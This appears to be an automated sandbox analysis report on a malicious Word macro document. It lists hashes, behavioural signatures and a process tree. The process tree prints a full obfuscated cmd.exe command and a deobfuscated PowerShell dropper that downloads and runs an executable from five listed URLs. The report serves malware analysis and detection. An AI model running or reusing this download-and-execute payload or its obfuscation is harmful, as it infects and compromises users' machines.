Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-05-2024 15:21

General

  • Target
    726665031b2e8bf327d418ef15cfc60b_JaffaCakes118.doc
  • Size
    76KB
  • MD5
    726665031b2e8bf327d418ef15cfc60b
  • SHA1
    35eb78421b3c8ee960e1c33b38ccd7a619183fb0
  • SHA256
    79eb8ce2f6e869a1583b04fe69318a6d7d125022d96b5ee2e02adb27c9b09bbd
  • SHA512
    a4125ed7f977ab55ff2149f7b76cb4ce1e9ebd48c9cfa4b7b924e40515d50ffab1630e09878892aaa28393b01239051a0338fdff040d87a4a58007f994535940
  • SSDEEP
    768:HpJcaUitGAlmrJpmxlzC+w99NB4+1ocMeZkxjsMdbfJfVQ+TNc:HptJlmrJpmxlRw99NB4+acMdhQ+p

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (type: exe.dropper)
    http://kaijiang001.com/xxwBiLY
    http://ericsweredoski.com/C
    http://www.tri-solve.com/4ZO
    http://onlinelegalsoftware.com/RPtWwdec
    http://www.ultigamer.com/wp-admin/includes/d

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\726665031b2e8bf327d418ef15cfc60b_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3020
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V/C"^se^t ^8I=^ ^ ^ ^ ^ ^ ^ ^}^}^{^hctac}^;ka^er^b;U^qN$^ metI^-ekovnI^;)^UqN$ ,vl^P^$(el^i^F^da^olnwo^D.EVw${yrt^{)^f^j^z^$ n^i v^lP$(hc^aer^o^f^;'^exe.^'+Va^o^$+'^\^'^+c^i^l^b^u^p^:vne^$^=UqN^$^;'7^84^'^ =^ V^a^o^$;)^'^@^'(t^i^l^p^S.^'d/^s^ed^ulcn^i/ni^m^da^-^p^w/moc^.rem^a^git^l^u.^www//:pt^th^@c^e^d^w^WtPR/^m^oc^.er^a^wt^f^oslage^l^enilno//^:p^t^t^h@O^Z4/m^oc.ev^los^-^irt.^ww^w//^:^p^tth^@C/moc^.i^k^so^d^er^ewscire//^:ptth@Y^Li^B^wxx/^moc.100gnai^ji^ak//:^pt^t^h^'^=fj^z^$;tn^eilCbeW.^teN^ tcej^bo^-wen^=EVw^$^ l^le^hsrew^o^p&&^f^or /^L %^s ^in (^382,^-1^,0)d^o ^se^t ^q^7RX=!^q^7RX!!^8I:~%^s,1!&&i^f %^s l^s^s ^1 call %^q^7RX:^*q7RX^!^=%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $wVE=new-object Net.WebClient;$zjf='http://kaijiang001.com/xxwBiLY@http://ericsweredoski.com/C@http://www.tri-solve.com/4ZO@http://onlinelegalsoftware.com/RPtWwdec@http://www.ultigamer.com/wp-admin/includes/d'.Split('@');$oaV = '487';$NqU=$env:public+'\'+$oaV+'.exe';foreach($Plv in $zjf){try{$wVE.DownloadFile($Plv, $NqU);Invoke-Item $NqU;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2512

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize: 20KB
    MD5: 118296779ef3cf1d2f88414b44ef3910
    SHA1: 81e3c7de27ace5ba3430023a455b5909e51d9b80
    SHA256: 09244baa9e8bb6d7e8771337e436b3bce5a60295850becf35ead95a1a362f91c
    SHA512: b9f32a7439c8aec1543a18fa2ed3846552145f7dbc47e25fd3d42008fea0737738f5b85dc86b26f34de4741092156b46f957b88e0f86c98703cddff98bf72275
  • memory/2988-11-0x0000000000640000-0x0000000000740000-memory.dmp (Filesize: 1024KB)
  • memory/2988-2-0x000000007096D000-0x0000000070978000-memory.dmp (Filesize: 44KB)
  • memory/2988-7-0x0000000000640000-0x0000000000740000-memory.dmp (Filesize: 1024KB)
  • memory/2988-8-0x0000000000640000-0x0000000000740000-memory.dmp (Filesize: 1024KB)
  • memory/2988-10-0x0000000000640000-0x0000000000740000-memory.dmp (Filesize: 1024KB)
  • memory/2988-0-0x000000002F121000-0x000000002F122000-memory.dmp (Filesize: 4KB)
  • memory/2988-6-0x0000000000640000-0x0000000000740000-memory.dmp (Filesize: 1024KB)
  • memory/2988-9-0x0000000000640000-0x0000000000740000-memory.dmp (Filesize: 1024KB)
  • memory/2988-22-0x000000007096D000-0x0000000070978000-memory.dmp (Filesize: 44KB)
  • memory/2988-23-0x0000000000640000-0x0000000000740000-memory.dmp (Filesize: 1024KB)
  • memory/2988-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/2988-40-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/2988-41-0x000000007096D000-0x0000000070978000-memory.dmp (Filesize: 44KB)